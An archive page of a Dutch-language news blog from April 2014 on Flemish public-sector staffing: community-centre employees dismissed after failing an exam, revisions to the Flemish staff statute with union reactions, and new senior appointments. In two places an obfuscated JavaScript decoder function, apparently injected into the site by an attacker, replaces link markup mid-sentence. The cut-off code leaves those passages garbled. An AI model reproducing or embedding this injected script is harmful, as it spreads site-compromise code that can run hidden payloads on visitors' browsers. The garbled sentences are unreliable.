Archief april, 2014

Reacties uitgeschakeld voor 60% slaagt niet voor examen voor de eigen functie

60% slaagt niet voor examen voor de eigen functie

Door | 26 april 2014 | Nieuws

De Lille: ‘Begrip voor ontgoocheling ontslagen personeel’
door © brusselnieuws.be
Brussel
13:31 – 26/04/2014
VGC-collegelid Bruno De Lille (Groen) zegt begrip te hebben voor de ontgoocheling bij de gemeenschapscentra. Heel wat mensen die al lang in dienst zijn, moeten vertrekken omdat ze niet slaagden voor een examen.

24/04/2014
Gemeenschapscentra: tientallen personeelsleden verliezen job
Bij de gemeenschapscentra moeten heel wat mensen opstappen. Zij hadden tijdelijke contracten die telkens verlengd werden, en moesten slagen voor een examen om een vast contract te bekomen. Maar verscheidene van hen slaagden niet.

De Lille zegt dat hij de emotionele reacties begrijpt. “Ik werk met een aantal van de niet geslaagde personeelsleden geregeld samen en heb dus alle begrip voor hun situatie. Maar het VGC-college is hier met handen en voeten gebonden aan de regelgeving die bepaalt dat contracten van onbepaalde duur enkel kunnen toegekend worden na een examen. Wij hebben er alles aan gedaan om die examens eerlijk en objectief te laten verlopen. Het college zal er nu ook alles aan doen om menselijk om te gaan met de gevolgen.”

De Lille gaat samen met collegeleden Grouwels (CD&V) en Vanhengel (Open VLD) de uitkomst van het overleg tussen de bonden en de leidend ambtenaar bekijken. Hij gaat ook samenzitten met Jobpunt Vlaanderen, dat de examens mee opstelde.

Reacties uitgeschakeld voor Vernieuwd statuut met meer mogelijkheden voor Vlaamse ambtenaar

Vernieuwd statuut met meer mogelijkheden voor Vlaamse ambtenaar

Door | 18 april 2014 | Nieuws

Bron: 13, Vlaams personeelsmagazine – mei 2014

 

door Veerle Van Den Broeck

Meer loopbaanmogelijkheden voor contractuelen en aangepaste regelingen voor ontslag, herplaatsing en de proeftijd: het zijn maar enkele dingen van het Vlaams personeelsstatuut die op 1 maart veranderen. Het is een eerste stap om het personeelsbeleid bij de Vlaamse overheid te moderniseren. 13 zet voor u de belangrijkste veranderingen op een rij.

Carrière voor contractuelen

Er komen meer loopbaanmogelijkheden voor contractuelen. Sommige contractuele collega’s kunnen vanaf 1 maart ook solliciteren voor een statutaire hogere functie (zoals een adviseursfunctie, hoofdmedewerker, hoofddeskundige, hoofdassistent, bevorderingen van bijvoorbeeld niveau C naar niveau A …). “Geval per geval zal bekeken worden of u effectief in aanmerking komt voor zo’n statutaire bevorderingsvacature”, benadrukt Matthias. “De voorwaarde is uiteraard dat u over het juiste diploma beschikt en dat u bij uw aanwerving als contractueel een selectieprocedure hebt doorlopen die vergelijkbaar is met die van een statutaire collega. Daarbij hoort bijvoorbeeld een algemene bekendmaking met onder meer vacatures in de krant en op websites, en een selectiereglement. Ook moeten onder andere uw competenties uitgebreid getest zijn. Er moet dus telkens bekeken worden of uw aanwervingsprocedure voldeed om in aanmerking te komen voor een bevordering. In de toekomst zal er in de vacatures expliciet vermeld worden of u later kunt meedoen aan zo’n statutaire bevorderingsprocedures.”

Daarnaast komen contractuele collega’s vanaf nu in aanmerking om tijdelijk als projectleider aangesteld te worden. “Het is immers belangrijk ook contractuele personeelsleden kansen te geven om door te groeien. Met deze aanpassingen kunnen we die collega’s voor het eerst perspectief bieden. Daarnaast kunnen we de arbeidsvoorwaarden van contractuele en statutaire collega's naar elkaar toe laten groeien”, geeft Matthias Roman mee.

Ontslagregeling

De ontslagregeling wordt iets soepeler. “Nu wordt een statutair personeelslid ontslagen na twee opeenvolgende evaluaties waarvan het resultaat een onvoldoende is”, zegt Matthias Roman van het Departement Bestuurszaken. “Vanaf 1 juli verandert dat: wie na een eerste onvoldoende evaluatie opnieuw een onvoldoende krijgt tijdens een van de twee eerstvolgende evaluaties, wordt ontslagen. Zo kunnen leidinggevenden optreden tegen mensen die het jaar na een slechte evaluatie, even een tandje bij zetten, maar het jaar daarna opnieuw ondermaats presteren.”

Vorig jaar in maart zei de minister van Bestuurszaken in 13 dat iemand al function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nlapps/docs/default.asp?id=1542">na één negatieve evaluatie ontslagen zou kunnen worden. Dat gaat dus niet door. Aan de ontslagregeling van contractuele collega’s verandert niets. Zij kunnen nog altijd ontslagen worden conform het arbeidsrecht, dus ook zonder een slechte evaluatie.

Proeftijd

Helemaal nieuw is de verplichte proeftijd van minimaal zes en maximaal twaalf maanden voor alle nieuwe topambtenaren en afdelingshoofden. Nu hoeven alleen externe kandidaten zo’n proeftijd te doorlopen.

De regeling voor de proeftijd wordt eenvoudiger. “Elke maand van de proeftijd telt vanaf maart 21 werkdagen”, legt Matthias uit. “Elke dag dat u gewerkt hebt, telt. Voltijds of deeltijds, dat maakt niet langer uit. Tellen ook mee als gewerkte dag: feestdagen, 2 en 15 november, 26 december, de vakantiedagen tussen kerst en nieuw, inhaalrust en dienstvrijstellingen. Een volledige dag afwezigheid door verlof voor deeltijdse prestatie, jaarlijks verlof, contractueel overeengekomen deeltijdse prestaties, deeltijdse loopbaanonderbreking of een andere verlofvorm telt niet mee als werkdag tijdens uw proeftijd.”

Nieuw is de verplichte proeftijd van minimaal zes en maximaal twaalf maanden voor alle nieuwe topambtenaren en afdelingshoofden. Nu moeten alleen externe kandidaten zo’n proeftijd doorlopen.

Toelage tijdelijk zwaardere functie

Sommige collega’s die tijdelijk extra verantwoordelijkheden of zwaardere taken opnemen (tijdelijk zwaardere functie door een belangrijk project, leidinggevende rol, toegenomen complexiteit van het werk  …), kunnen vanaf 1 maart aanspraak maken op een toelage. “Maar niet iedereen krijgt automatisch zo’n toelage bij een zwaardere taak of functie", legt Matthias uit. "Dat is een beslissing van de lijnmanager. De toelage wordt op objectieve wijze bepaald, op basis van de zogenaamde functieniveaumatrix. Dat is een systeem dat aan alle functies binnen de Vlaamse overheid een bepaalde zwaarte toekent en ze op basis daarvan onderbrengt in categorieën."

Herplaatsing

De regeling om personeelsleden te herplaatsen, wordt verfijnd. “Herplaatsing kan om heel wat redenen: er kunnen persoonlijke of medische redenen zijn, er kan een reorganisatie gebeurd zijn, iemand kan om allerlei redenen niet (langer) geschikt zijn voor zijn functie …”, zegt Matthias. “De regels voor herplaatsing naar een lagere rang werden aanpast. Zo’n herplaatsing zal mogelijk zijn om medische redenen, of wanneer het herplaatsingsbureau oordeelt dat een tewerkstelling in de huidige rang niet meer kan. Alleszins kan in dit laatste geval  de herplaatsing pas effectief doorgaan als het personeelslid hiermee instemt.  Daarbij is het uiteraard belangrijk dat het om een zinvolle job gaat die het betrokken personeelslid kan motiveren.”

Om misbruik van dit systeem van herplaatsing in de toekomst te vermijden, komt er nu een voortraject waarbij bekeken wordt of iemand in aanmerking komt. “Voor mensen die niet meer functioneren door psychische of sociale problemen, bijvoorbeeld, is herplaatsing niet de juiste oplossing. Om hen te helpen zijn er andere maatregelen nodig. Een leidinggevende moet daarnaast kunnen aantonen dat hij zijn personeelslid al de nodige begeleiding en ondersteuning heeft gegeven om beter te presteren.”

Wat verandert er voor de top?

Voor de topambtenaren verandert er binnenkort nog veel meer, al moet het VPS nog aangepast worden. Zij krijgen naast de rol van leider, manager, ondernemer en coach nog een extra rol, die van professioneel beleidsadviseur. Nu de kabinetten afgeslankt zijn, moeten ministers een beroep kunnen doen op de administratie voor beleidsvoorbereiding. Daarom moeten topambtenaren beschikken over een degelijke strategische visie op de bevoegdheden van de entiteit waar ze leiding aan geven. Dat betekent niet dat ze dezelfde mening moeten hebben als hun minister, maar ze moeten wel kunnen meepraten op strategisch niveau. Ook de functieprofielen, de selectie- en de (eind)evaluatieprocedure krijgen een update. De evaluatiecriteria worden aangepast. Een van de criteria wordt samenwerken, om de verkokering binnen de Vlaamse overheid verder tegen te gaan.

Meer dan twaalf jaar

Nu kan een topambtenaar maximaal twaalf jaar dezelfde functie uitoefenen. In de toekomst kan dat verlengd worden als een topambtenaar vier van de zes jaar van zijn mandaat een goede evaluatie heeft gekregen. Bovendien moet elke topambtenaar op dat moment een toekomstvisie uitwerken en ter goedkeuring voorleggen aan de Vlaamse Regering.

Betere begeleiding van nieuwe topambtenaren

Nieuwe topambtenaren krijgen in de toekomst meer begeleiding. Als er een nieuwe topambtenaar komt, zorgen mensen uit de entiteit, het beleidsdomein en het Departement Bestuurszaken voor een digitale infobundel met informatie over het VPS, beheersovereenkomsten, relevante begrotingsaspecten, raamcontracten … De nieuwe topambtenaar krijgt een meter of peter tijdens zijn proefperiode. Daarnaast komt er een managementhandboek.

De collega’s van het Agentschap voor  Overheidspersoneel en het Departement Bestuurszaken hebben in februari een onthaalsessie georganiseerd voor nieuwe topambtenaren. “Die viel alvast in de smaak”, zegt Filip Boelaert, die sinds 1 april als secretaris-generaal bij het Departement Mobiliteit en Openbare Werken aan de slag is. “Wat wordt er van ons verwacht? Welk overleg bestaat er? En bij wie kunnen we wanneer terecht? Voor beginnende topambtenaren is het zeker nuttig om daarover meer informatie te krijgen.”

Algemeen directeurs

Algemeen directeurs mogen alleen nog aangesteld worden in entiteiten met meer dan duizend personeelsleden of in entiteiten die ontstaan na de fusie van enkele andere entiteiten. In alle andere entiteiten wordt de huidige algemeen directeur - als die er is - niet meer vervangen.

Voor meer informatie kunt u het best contact opnemen met uw personeelsdienst.

 

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nlapps/data/docattachments/VPS%20flexibiliteit.jpg" alt="Flexibiliteit" align="textTop" border="0" />


Nog enkele aanpassingen

  • Wie in dienst komt, kan vanaf nu tot maximaal twintig jaar relevante ervaring uit de privé-sector in rekening brengen. Ervaring die u bij de overheid hebt opgedaan, kunt u sowieso meenemen.
  • Alle kandidaat-afdelingshoofden moeten minstens zes jaar relevante ervaring hebben.
  • Tijdens of na de hospitalisatie van een zwaar ziek minderjarig kind kunt u medisch bijstandsverlof opnemen met één week eventueel verlengbaar met één week. U hoeft in dat geval het verlof niet met één volle maand op te nemen.
  • De carpoolvergoeding wordt een toelage die één keer per jaar uitbetaald wordt. Die aanpassing komt er na opmerkingen van de fiscus en de Rijksdienst voor Sociale Zekerheid.
  • Elektronische evaluatieverslagen zijn geen probleem meer. Het VPS vereist niet langer een handtekening op papier.

Wat vinden de vakbonden?

“Oorspronkelijke voorstellen onaanvaardbaar”

De vakbonden zijn niet onverdeeld gelukkig met de aanpassingen aan het VPS. De oorspronkelijke voorstellen waren alvast onaanvaardbaar voor hen. “Als je ziet vanwaar we komen, denk ik dat het eindresultaat een mooi compromis is”, zegt Jos Mermans van de liberale vakbond VSOA. “Het oorspronkelijke voorstel bevatte een aantal aanpassingen die van een andere planeet leken te komen. Het bewijst dat vakbondsoverleg nut heeft.”

“We zijn blij dat de soepelere ontslagregeling beperkt gebleven is tot ontslag voor wie na een onvoldoende opnieuw een negatief resultaat krijgt tijdens een van de twee eerstvolgende evaluaties”, zegt Jan Van Wesemael van de socialistische vakbond ACOD. “Eerst ging het om de vier daaropvolgende evaluaties. We begrijpen dat er strenger opgetreden moet kunnen worden, maar vier jaar een zwaard van Damocles boven iemands hoofd is te lang.”

De christelijke vakbond ACV vindt het jammer dat er nu op details gefocust wordt en mist een langetermijnvisie. “De maatregelen zijn er vooral op gericht om mensen te straffen”, zegt Nathalie Hiel. “Iedereen moet langer werken, dus ze zouden beter kijken hoe we dat kunnen bereiken. Daarnaast kunnen we ons niet vinden in het feit dat interne kandidaten geen voorrang meer krijgen bij N-1-functies. Er zit genoeg talent binnen de Vlaamse overheid dat beter benut zou kunnen worden.”

Personeelsbeleid van de toekomst

“We moeten vooral flexibel zijn”

Hoe moet ons personeelsbeleid er in de toekomst uitzien? Dat is de vraag waarover de collega’s van het Departement Bestuurszaken zich de voorbije maanden gebogen hebben met geïnteresseerde vrijwilligers uit de hele Vlaamse overheid. “Mensen willen vooral gehoord worden als het over hun werk gaat en in welke omstandigheden ze dat moeten doen”, zegt projectleider Karolien Van Dorpe. “Flexibiliteit is het sleutelwoord. Opvallend is wel dat werknemers dat begrip anders invullen dan leidinggevenden. Die willen vooral medewerkers die altijd en overal bereikbaar zijn, terwijl werknemers vooral denken aan telewerken en de mogelijkheden om werk en privéleven te combineren. Daar zullen we dus een evenwicht in moeten vinden.”

“Grote vraag bij de start van ons onderzoek was of we ons beleid moeten aanpassen aan de zogenaamde generatie Y. Dat hoeft niet, zo blijkt uit onze bevraging. Er zijn amper verschillen tussen generaties. Om talent aan te trekken en te houden moeten we wel enkele andere aanpassingen doorvoeren, maar we zijn op de goede weg.”

 

Reacties uitgeschakeld voor Nieuwe Vlaamse topambtenaren

Nieuwe Vlaamse topambtenaren

Door | 10 april 2014 | Nieuws

Filip Boelaert (40)

Sinds 1 april 2014 secretaris-generaal van het Departement Mobiliteit en Openbare Werken

Vorige functie: kabinetschef bij Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits

Opvolger van: Fernand Desmyter
Joris Relaes (51)

Sinds 1 april 2014 administrateur-generaal van het Instituut voor Landbouw- en Visserijonderzoek (ILVO)

Vorige functie: kabinetschef Landbouw, Visserij en Plattelandsbeleid bij Vlaams minister-president Kris Peeters

Opvolger van: Erik Van Bockstaele
Chris Danckaerts (53)

Vanaf 1 mei 2014 gedelegeerd bestuurder van nv De Scheepvaart

Vorige functie: algemeen directeur bij nv De Scheepvaart

Opvolger van: Erik Portugaels
Gonda Cock (61)

Sinds 1 maart 2014 projectleider N-niveau bij het Departement Bestuurszaken

Vorige functie: administrateur-generaal bij het agentschap Centrale Accounting
Steven Dessein (38)

Sinds 1 april 2014 administrateur-generaal van het Agentschap Plantentuin Meise

Vorige functie: waarnemend leidend ambtenaar bij het Agentschap Plantentuin Meise
James Van Casteren (42)

Vanaf 1 mei 2014 administrateur-generaal van het Vlaams Agentschap voor Personen met een Handicap

Vorige functie: afdelingshoofd Woonbeleid bij Wonen-Vlaanderen

Opvolger van: Laurent Burssens
Alona Lyubayeva (41)

Vanaf 5 mei 2014 Vlaams Diversiteitsambtenaar

Vorige functie: Bestuurssecretaris Onthaalbureau Inburgering provincie Vlaams-Brabant

Opvolger van: Ingrid Pelssers